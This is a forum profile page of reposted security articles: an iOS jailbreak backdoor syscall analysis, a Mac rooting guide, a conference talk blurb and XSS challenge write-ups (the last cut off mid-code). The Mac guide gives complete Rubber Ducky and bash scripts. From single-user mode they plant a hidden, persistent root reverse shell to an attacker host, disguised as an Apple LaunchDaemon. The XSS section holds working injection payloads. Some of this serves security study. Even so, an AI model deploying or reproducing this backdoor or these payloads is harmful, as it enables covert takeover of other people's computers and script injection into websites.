-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
[h=1]Evading iOS Security[/h]Here’s some code: main() { syscall(0, 0x41414141, -1); } Here’s what happens when you run it on a device using evasi0n7: panic(cpu 0 caller 0x9dc204d7): sleh_abort: prefetch abort in kernel mode: fault_addr=0x41414140 r0: 0xffffffff r1: 0x27dffdec r2: 0x2bf0e9c4 r3: 0x2bf0e95c r4: 0x41414141 r5: 0xa48782d4 r6: 0x81b6f594 r7: 0x8f5d3fa8 r8: 0x9df1d614 r9: 0x81b6f330 r10: 0x9df1db00 r11: 0x00000006 r12: 0x00000000 sp: 0x8f5d3f60 lr: 0x93dd7048 pc: 0x41414140 cpsr: 0x20000033 fsr: 0x00000005 far: 0x41414140 And here’s what happens on an ARM64 device that also uses evasi0n7: panic(cpu 0 caller 0xffffff801522194c): PC alignment exception from kernel. (saved state: 0xffffff800dbc4640) x0: 0x2bea99c400401e08 x1: 0x00402fe92bea995c x2: 0xbdf4cd1500403008 x3: 0x0040156400000000 x4: 0x0040156400000000 x5: 0x000000002bea995c x6: 0x00402fe92bea995c x7: 0xffffff80975df438 x8: 0xffffffff41414141 x9: 0x000000000000000e x10: 0xffffff8096f9b100 x11: 0x0000000000000000 x12: 0x0000000003000004 x13: 0x0000000000401420 x14: 0x000000002be925a1 x15: 0x0000000000402ffe x16: 0x0000000000000000 x17: 0x0000000000000000 x18: 0x0000000000000000 x19: 0xffffff8096f9b410 x20: 0xffffff80977203f0 x21: 0xffffff80975df438 x22: 0xffffff80155ea3c8 x23: 0x0000000000000018 x24: 0xffffff8096f9b418 x25: 0x0000000000000000 x26: 0x0000000000000006 x27: 0x0000000000000000 x28: 0xffffff80155ea3c8 fp: 0xffffff800dbc4a60 lr: 0xffffff8015362434 sp: 0xffffff800dbc4990 pc: 0xffffffff41414141 cpsr: 0x60000304 esr: 0x8a000000 far: 0xffffffff41414141 ..And here’s the system call handler for system call 0… (ARM32 of course!) __text:00000000 CODE32 __text:00000000 STMFD SP!, {R4-R7,LR} __text:00000004 MOV R5, R2 __text:00000008 MOV R6, R1 __text:0000000C LDR R0, =0x9E415A34 __text:00000010 BLX R0 __text:00000014 LDR R0, =0x9E41E160 __text:00000018 BLX R0 __text:0000001C LDR R0, =0x9E415958 __text:00000020 BLX R0 __text:00000024 LDR R0, [R6] __text:00000028 CMP R0, #0 __text:0000002C BEQ locret_50 __text:00000030 MOV R4, R0 __text:00000034 LDR R0, [R6,#4] __text:00000038 LDR R1, [R6,#8] __text:0000003C LDR R2, [R6,#0xC] __text:00000040 LDR R3, [R6,#0x10] __text:00000044 BLX R4 __text:00000048 STR R0, [R5] __text:0000004C MOV R0, #0 __text:00000050 __text:00000050 locret_50 ; CODE XREF: __text:0000002Cj __text:00000050 LDMFD SP!, {R4-R7,PC} __text:00000050 ; --------------------------------------------------------------------------- __text:00000054 off_54 DCD 0x9E415A34 ; DATA XREF: __text:0000000Cr __text:00000058 off_58 DCD 0x9E41E160 ; DATA XREF: __text:00000014r __text:0000005C off_5C DCD 0x9E415958 ; DATA XREF: __text:0000001Cr Jailbreaking ruins security and integrity. Enough said. Have a good day. (Oh, it also can be used by any user, including mobile. One can wonder if TaiG or such is using this as a back door…) Sursa: Evading iOS Security – winocmblag
-
Root a Mac in 10 seconds or less Posted on November 18, 2013 by Patrick Mosca Often times, physical access to a machine means game over. While people like to think that OSX is immune to most security threats, even Apple computers can be susceptible to physical attacks. Mac OSX is capable of booting into single user mode by holding a special key combination (Command-S). From this point, an attacker has root access to the entire computer. Note that this is not a security exploit, but rather an intentionally designed feature. While of course the intruder needs to be physically present, this can become a huge security problem. (There is proven method for preventing this attack that I will cover at the end of the article.) Since physical access to the machine is required, time is precious and must be cut to a minimum. There are two methods for optimizing time, scripts and a little tool called the USB Rubber Ducky. The Rubber Ducky is small HID that looks like a flash drive and acts like a keyboard. It is designed to pound out scripts at freakish speeds, as if you were typing it yourself. Of course, a flash drive will work too. This backdoor is almost identical to the basic backdoor described in OSX Backdoor – Persistence. Read that article if you would like to better understand the inner workings of this backdoor. Similarly, we will create a script that sends a shell back home through netcat. Finally, we will add the script as a Launch Daemons where it will be executed as root every 60 seconds. The Rubber Ducky Method 1) Download the Ducky Decoder and Firmware from here. Be sure to use duck_v2.1.hex or above. There are instructions on how to flash your ducky. At the time of writing this, I used Ducky Decoder v2.4 and duck_v2.1.hex firmware. (Special thanks to midnitesnake for patching the firmware) 2) Create the script source.txt. Be sure to replace mysite.com with your IP address or domain name. Similarly, place your port number 1337 on the same line. REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo ' ENTER STRING ENTER STRING Label ENTER STRING com.apples.services ENTER STRING ProgramArguments ENTER STRING ENTER STRING /bin/sh ENTER STRING /Library/.hidden/connect.sh ENTER STRING ENTER STRING RunAtLoad ENTER STRING ENTER STRING StartInterval ENTER STRING 60 ENTER STRING AbandonProcessGroup ENTER STRING ENTER STRING ENTER STRING ' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER 3) Compile and install the script. From within the ducky decoder folder, execute: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]java -jar encoder.jar -i source.txt -o inject.bin -l us [/TD] [/TR] [/TABLE] Move your inject.bin over to the ducky. 4) Boot into single user mode (Command – S). 5) At the command prompt, plug in ducky. 6) Catch your shell. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l -p 1337 [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l 1337 [/TD] [/TR] [/TABLE] Say hello! You are now root The USB Flash Drive Method 1) Create the file install.bash on a flash drive. #!/bin/bash #Create the hidden directory /Library/.hidden mkdir /Library/.hidden #Copy the script to hidden folder echo " #!/bin/bash bash -i >& /dev/tcp/mysite.com/1337 0>&1 wait" > /Library/.hidden/connect.sh #Give the script permission to execute chmod +x /Library/.hidden/connect.sh #Create directory if it doesn't already exist. mkdir /Library/LaunchDaemons #Write the .plist to LaunchDaemons echo ' Label com.apples.services ProgramArguments /bin/sh /Library/.hidden/connect.sh RunAtLoad StartInterval 60 AbandonProcessGroup ' > /Library/LaunchDaemons/com.apples.services.plist chmod 600 /Library/LaunchDaemons/com.apples.services.plist #Load the LaunchAgent launchctl load /Library/LaunchDaemons/com.apples.services.plist shutdown -h now 2) Boot into single user mode (Command – S). 3) Execute the commands. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11[/TD] [TD=class: code]mount -uw / mkdir /Volumes/usb ls /dev mount_msdos /dev/disk1s1 /Volumes/usb cd /Volumes/usb ./install.bash [/TD] [/TR] [/TABLE] disk1s1 will change! If you’re not sure which device is your flash, take out your device, list devices, put your flash drive back in, and list devices. Your flash drive will be the device that has come and gone. 4) Catch your shell. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l -p 1337 [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]nc -l 1337 [/TD] [/TR] [/TABLE] The difference between the USB Rubber Ducky method and the flash drive method is night and day. There is a little more preparation that goes into setting up the ducky, but execution time is prime. When time is of the essence, listing devices, making directories, and mounting flash drives can impede on an “operation.” Either route you choose, both methods will ensure a persistent backdoor as the root user As for preventing this lethal attack, there are two possible defenses. Locking the EFI firmware will prevent users from accessing single user mode by locking single user mode with a password. Don’t do this. It is a complete waste of time. The password can be reset by removing physical RAM and resetting the PRAM as described here. The only sure way to prevent unwanted root access to your system is by simply enabling File Vault’s full disk encryption (not home folder encryption!). Since this encrypts the entire drive, it is will be impossible to access single user mode without the (strong) password. Problem solved. This article was written to show the vulnerabilities of Macs without full disk encryption or locked EFI firmware. Please no one get in trouble. It is very easy to sniff the wire and find the attacker’s IP address that is causing excessive noise every 60 seconds. I put the script and version 2.6.3 of the ducky encoder on Github for convenience. If you found this interesting, give a star. Thanks for reading. Sursa: Root a Mac in 10 seconds or less | Patrick Mosca
-
30c3 - The Arduguitar: An Ardunio Powered Electric Guitar Description: The ArduGuitar An Ardunio Powered Electric Guitar The ArduGuitar is an electric guitar with no physical controls, i.e. no buttons or knobs to adjust volume, tone or to select the pickups. All of these functions are performed remotely via a bluetooth device such as an Android phone, or via a dedicated Arduino powered blutetooth footpedal. The musician still plucks the strings, of course! This talk will give an overview of the technology and particularly the voyage that took me from nearly no knowledge about anything electronic to enough know-how to make it all work.I will explain what I learned by collaborating on forums, with Hackerspaces and with component providers: "How to ask the right questions." The guitar with its Arduino powered circuit and an Android tablet will be available for demo; the code is all available on the github arduguitar repo with the associated Arduino footpedal libraries. For More Information please visit : - https://events.ccc.de/congress/2013/wiki/Main_Page Sursa: 30c3 - The Arduguitar: An Ardunio Powered Electric Guitar
-
escape.alf.nu XSS Challenges Write-ups (Part 2) These are my solutions to Erling Ellingsen escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones published in this post). Im publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you havent done it so far, is to go and try to solve them by yourselves…. so come on, dont be lazy, stop reading here and give them a try … … … … … Ok so if you have already solve them or need some hints, here are my solutions Level 9: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7[/TD] [TD=class: code]function escape(s) { // This is sort of a spoiler for the last level if (/[\\<>]/.test(s)) return '-'; return '<script>console.log("' + s.toUpperCase() + '")</script>'; }[/TD] [/TR] [/TABLE] Some as level 8 but now we cannot use angle brackets (<>) nor backslashes (\) Solutions: Is it possible to use an online non-alphanumeric encoder to encode the following payload so it uses no alpha characters, angle brackets (<>) nor backslashes (\) [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+alert(1))//[/TD] [/TR] [/TABLE] Producing a huge solution (5627): [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))())//[/TD] [/TR] [/TABLE] We can also try to use our own minimization using the letters in “false”, “true”, “undefined” and “object”: [TABLE] [TR] [TD]”+!1[/TD] [TD]false[/TD] [/TR] [TR] [TD]”+!0[/TD] [TD]true[/TD] [/TR] [TR] [TD]”+{}[0][/TD] [TD]undefined[/TD] [/TR] [TR] [TD]”+{}[/TD] [TD][object Object][/TD] [/TR] [/TABLE] Strings we will need: [TABLE] [TR] [TD]sort[/TD] [TD][(”+!1)[3]+(”+{})[1]+(”+!0)[1]+(”+!0)[0]][/TD] [/TR] [TR] [TD]constructor[/TD] [TD][(”+{})[5]+(”+{})[1]+(”+{}[0])[1]+(”+!1)[3]+(”+!0)[0]+(”+!0)[1]+(”+!0)[2]+(”+{})[5]+(”+!0)[0]+(”+{})[1]+(”+!0)[1]][/TD] [/TR] [TR] [TD]alert(1)[/TD] [TD](”+!1)[1] + (”+!1)[2] + (”+!1)[4] +(”+!0)[1]+(”+!0)[0]+”(1)”[/TD] [/TR] [/TABLE] We will replace the call to alert(1) in our payload: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+alert(1))//[/TD] [/TR] [/TABLE] with the following one so we can simplify the encoding to encode strings. [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[]["sort"]["constructor"]("alert(1)")()//[/TD] [/TR] [/TABLE] Note: Many other alternatives are possible like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+(0)['constructor']['constructor']("alert(1)")()//[/TD] [/TR] [/TABLE] But I found the “sort” one to be the shortest (with other 4 letter functions like “trim”) This is a 246 characters solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]"+[][(''+!1)[3]+(''+{})[1]+(''+!0)[1]+(''+!0)[0]][(''+{})[5]+(''+{})[1]+(''+{}[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+{})[5]+(''+!0)[0]+(''+{})[1]+(''+!0)[1]]((''+!1)[1] + (''+!1)[2] + (''+!1)[4] +(''+!0)[1]+(''+!0)[0]+"(1)")())//[/TD] [/TR] [/TABLE] We can improve it by defining a variable containing all our letters and then just referencing it: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]_=''+!1+!0+{}[0]+{} = "falsetrueundefined[object Object]"[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//[/TD] [/TR] [/TABLE] Now the solution is 144 characters which is still far from the winners: Next iteratation is to change the base payload for something sorter like window.alert(1) In chrome, we can leak a reference to window with: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](0,[]["concat"])()[0][/TD] [/TR] [/TABLE] So using the same strings as above we get the following 100 characters solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");_=""+!1+!0+{}[0]+{};(0,[][_[23]+_[19]+_[10]+_[23]+_[1]+_[5]])()[0][_[1]+_[2]+_[4]+_[6]+_[5]](1)//[/TD] [/TR] [/TABLE] We are still taking too many chars for defining our alphabet. Here is where Mario surprised me once again with this tweet: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]");(_=!1+URL+!0,[][_[8]+_[11]+_[7]+_[8]+_[1]+_[9]])()[0][_[1]+_[2]+_[4]+_[38]+_[9]](1)//[/TD] [/TR] [/TABLE] Note that he is using !1+URL+!0 as the alphabet string and it difers for different browsers: Firefox: [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]_=!1+URL+!0="falsefunction URL() { [native code] }true"[/TD] [/TR] [/TABLE] Chrome: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]_=!1+URL+!0="falsefunction URL() { [native code] }true"[/TD] [/TR] [/TABLE] Other interesting Mario ’s finding is that inside with-statements, almost everything leaks [object Window] for example: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]with(0) x=[].sort,)[/TD] [/TR] [/TABLE] Level 10: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26[/TD] [TD=class: code]function escape(s) { function htmlEscape(s) { return s.replace(/./g, function(x) { return { '<': '<', '>': '>', '&': '&', '"': '"', "'": ''' }[x] || x; }); } function expandTemplate(template, args) { return template.replace( /{(\w+)}/g, function(_, n) { return htmlEscape(args[n]); }); } return expandTemplate( " \n\ <h2>Hello, <span id=name></span>!</h2> \n\ <script> \n\ var v = document.getElementById('name'); \n\ v.innerHTML = '<a href=#>{name}</a>'; \n\ <\/script> \n\ ", { name : s } ); }[/TD] [/TR] [/TABLE] Injection takes place in a JS string context and since “\” is not escaped in the htmlEscape function, we can use hex or octal encoding for the “<” symbol and bypass the escaping function. Valid solutions: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]\x3csvg onload=alert(1)[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]\74svg onload=alert(1)[/TD] [/TR] [/TABLE] Level 11: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]function escape(s) { // Spoiler for level 2 s = JSON.stringify(s).replace(/<\/script/gi, ''); return '<script>console.log(' + s + ');</script>'; }[/TD] [/TR] [/TABLE] I’ve seen similar escaping functions in real applications, normally it is not a good idea to fix the input data, you either accept it or reject it but trying to fix it normally leads to bypasses. In this case the escape function replaces “</script” with an empty string so shortest solution is: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]</</scriptscript><script>alert(1)//[/TD] [/TR] [/TABLE] Level 12: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; var json = JSON.stringify(obj).replace(/\//g, '\\/'); return "<script>" + thing[0] + "(" + json +")</script>"; }[/TD] [/TR] [/TABLE] Similar to level 7 but this time the backslash is also escaped so we use a similar vector with a different way to comment the junk out: Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]'#';alert(1)<!--[/TD] [/TR] [/TABLE] It will render: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<script>'({"userdata":"';alert(1)<!--"})</script>[/TD] [/TR] [/TABLE] Level 13: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19[/TD] [TD=class: code]function escape(s) { var tag = document.createElement('iframe'); // For this one, you get to run any code you want, but in a "sandboxed" iframe. // // http://print.alf.nu/?text=... just outputs whatever you pass in. // // Alerting from print.alf.nu won't count; try to trigger the one below. s = '<script>' + s + '<\/script>'; tag.src = 'http://print.alf.nu/?html=' + encodeURIComponent(s); window.WINNING = function() { youWon = true; }; tag.onload = function() { if (youWon) alert(1); }; document.body.appendChild(tag); }[/TD] [/TR] [/TABLE] Iframes have a interesting feature: setting the name attribute on an iframe sets the name property of the iframe’s global window object to the value of that string. Now, the interesting part is that it can be done the other way around, so an iframe can define its own window.name and the new name will be injected in the parent’s global window object if it does not exist already (it cannot overwrite it). So if we fool the framed site to declare its window.name as “youWon”, a youWon variable will be setted in the parent global window object and so the “alert(1)” will be popped Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]name='youWon'[/TD] [/TR] [/TABLE] Level 14: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18[/TD] [TD=class: code]<!DOCTYPE HTML> function escape(s) { function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); } function html(s) { return s.replace(/[<>"&]/g, function(s) { return '' + s.charCodeAt(0) + ';'; }); } return ( '<script>' + 'var url = ' + json(s) + '; // We\'ll use this later ' + '</script>\n\n' + ' <!-- for debugging -->\n' + ' URL: ' + html(s) + '\n\n' + '<!-- then suddenly -->\n' + '<script>\n' + ' if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' + ' else new Image().src = url;\n' + '</script>' ); }[/TD] [/TR] [/TABLE] In order to solve this level we need to be familiar with an HTML5 parser “feature” when dealing with comments in JS blocks. This feature is well described in this post (thanks for the hint @cgvwzq!). The trick is that injecting an HTML5 single line comment “<!—” followed by a “<script>” open tag will move the parser into the “script data double escaped state” until the closing script tag is found and then it will transition into “script data escaped state” and it will treat anything from the end of the string where we injected the “<!—<script>” as JS! only thing we need to do is making sure there is a “—>” so that the parser does not throw an invalid syntax exception. So basically, if there is a “—>” somewhere in the code (or we can inject it) we can fool the parser into processing HTML as JS. The string where we inject “<!—<script>” will still be considered as a JS string an everything following the string will become JS. For this level we will make the JS engine to parse the HTML part (URL: xxx). In order to do so, we will start our payload with “alert(1)” so that the first JS evaluated will be “URL: alert(1)” then we want to comment out the remaining JS code so we will insert a multi-line comment start “/”. This way everything else will be commented out until we reach the “/” present in the regexp; the code from that point on will be evaluated. In order to get a valid regexp we will also inject “if(/a/” before the multi-line comment start. So our payload will look like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]alert(1);/*<!--<script>*/if(/a//*[/TD] [/TR] [/TABLE] The resulting code will be: Now if we clean it up and remove the comments (in grey): [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]<script> var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*"; URL: alert(1); if(/a/.test(url)) console.log("Bad url: " + url); else new Image().src = url; </script>[/TD] [/TR] [/TABLE] We can get it even shorter with: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]if(alert(1)/*<!--<script>[/TD] [/TR] [/TABLE] This will turn into: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]<script> var url = 